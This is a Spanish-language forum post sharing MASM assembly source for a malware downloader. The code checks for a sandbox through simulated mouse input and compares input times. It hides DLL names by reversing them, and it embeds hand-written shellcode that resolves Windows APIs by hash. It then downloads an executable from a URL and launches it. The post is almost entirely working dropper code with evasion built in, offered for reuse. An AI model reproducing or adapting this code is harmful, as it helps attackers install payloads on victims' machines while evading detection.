[MASM] File Downloader

Iniciado por ANTRAX, Junio 05, 2012, 04:41:40 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 05, 2012, 04:41:40 PM Ultima modificación: Junio 03, 2013, 11:53:58 AM por Expermicid
Código: asm
.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib

LASTINPUTINFO struct
    cbSize DWORD ?
    dwTime DWORD ?
LASTINPUTINFO ends

.data

szLoadAPI db 055h, 08Bh, 0ECh, 083h, 0C4h, 0F4h, 052h, 089h, 055h, 0FCh, 08Bh, 04Ah, 03Ch, 003h, 0CAh, 089h, 04Dh, 0F4h, 08Bh, 049h
          db 078h, 003h, 0CAh, 089h, 04Dh, 0F8h, 08Bh, 051h, 018h, 08Bh, 049h, 020h, 003h, 04Dh, 0FCh, 033h, 0FFh, 08Bh, 031h, 003h
          db 075h, 0FCh, 033h, 0C0h, 051h, 0ACh, 08Bh, 0C8h, 003h, 0F8h, 0D3h, 0C7h, 085h, 0C0h, 075h, 0F5h, 059h, 03Bh, 0FBh, 074h
          db 010h, 083h, 0C1h, 004h, 04Ah, 075h, 0E0h, 0BAh, 0C2h, 058h, 062h, 01Bh, 05Ah, 033h, 0C0h, 0C9h, 0C3h, 08Bh, 045h, 0FCh
          db 08Bh, 04Dh, 0F8h, 08Bh, 059h, 018h, 08Bh, 049h, 024h, 003h, 0C8h, 02Bh, 0DAh, 0D1h, 0E3h, 003h, 0CBh, 00Fh, 0B7h, 019h
          db 08Bh, 04Dh, 0F8h, 08Bh, 049h, 01Ch, 003h, 0C8h, 0C1h, 0E3h, 002h, 003h, 0CBh, 003h, 001h, 05Ah, 0C9h, 0C3h

    szURL                   db 'http://example.com/file.exe', 0
    szFileName              db 'deadlyvermilion.exe', 0

    szURLMon                db 'lld.noMLRU', 0
    szShell32               db 'lld.23llehS', 0

    dwLoadAPI               DWORD ?

    dwLoadLibraryA          DWORD ?
    dwURLMon                DWORD ?
    dwShell32               DWORD ?
    dwURLDownloadToFileA    DWORD ?
    dwShellExecuteA         DWORD ? 

    FirstInput      LASTINPUTINFO <>
    SecondInput     LASTINPUTINFO <>
   
.code

StrReverse proc lpString:LPSTR
mov eax,lpString                       ; put string address in EAX
mov edx,eax                            ; same in EDX
@@:                                    ; move EDX to the end of string
add edx,1
cmp byte ptr [edx],0
jne @B
sub edx,1                              ; return EDX to last not null character
@@:
mov cl,byte ptr [eax]          ; swap EAX and EDX, moving from two brinks
mov ch,byte ptr [edx]          ; in opposite directions
mov [eax],ch                   ; while EAX is less than EDX
mov [edx],cl
add eax,1
sub edx,1
cmp eax,edx
jl @B
ret
StrReverse endp

;********************************************************************************

start:

    MOV FirstInput.cbSize, SizeOf LASTINPUTINFO
    MOV SecondInput.cbSize, SizeOf LASTINPUTINFO

    Invoke GetLastInputInfo, ADDR FirstInput
    Invoke Sleep, 5000
    Invoke mouse_event, MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
    Invoke mouse_event, MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
    Invoke GetLastInputInfo, ADDR SecondInput

    MOV EAX, SecondInput.dwTime
    SUB EAX, FirstInput.dwTime
    CMP EAX, 4500
    JL ExitMain


    Invoke VirtualProtect, ADDR szLoadAPI, 118, PAGE_EXECUTE_READWRITE, 0

    Invoke StrReverse, ADDR szURLMon
    Invoke StrReverse, ADDR szShell32

    LEA EAX, szLoadAPI
    MOV dwLoadAPI, EAX

    ASSUME FS:NOTHING
    MOV EAX, FS:[30h]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX]
    MOV EAX, [EAX]
    MOV EAX, [EAX+18h]

    MOV EDX, EAX
    MOV EBX, 0A216A185h
    CALL dwLoadAPI
    MOV dwLoadLibraryA, EAX

    PUSH OFFSET szURLMon
    CALL EAX
    MOV dwURLMon, EAX

    PUSH OFFSET szShell32
    CALL dwLoadLibraryA
    MOV dwShell32, EAX

    MOV EDX, dwURLMon
    MOV EBX, 0B2040657h
    CALL dwLoadAPI
    MOV dwURLDownloadToFileA, EAX

    MOV EDX, dwShell32
    MOV EBX, 0D9A88A30h
    CALL dwLoadAPI
    MOV dwShellExecuteA, EAX

    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH OFFSET szURL
    PUSH 0
    CALL dwURLDownloadToFileA

    PUSH 0
    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH 0
    PUSH 0
    CALL dwShellExecuteA     
   
ExitMain:
    RET
end start


By DeadlyVermilion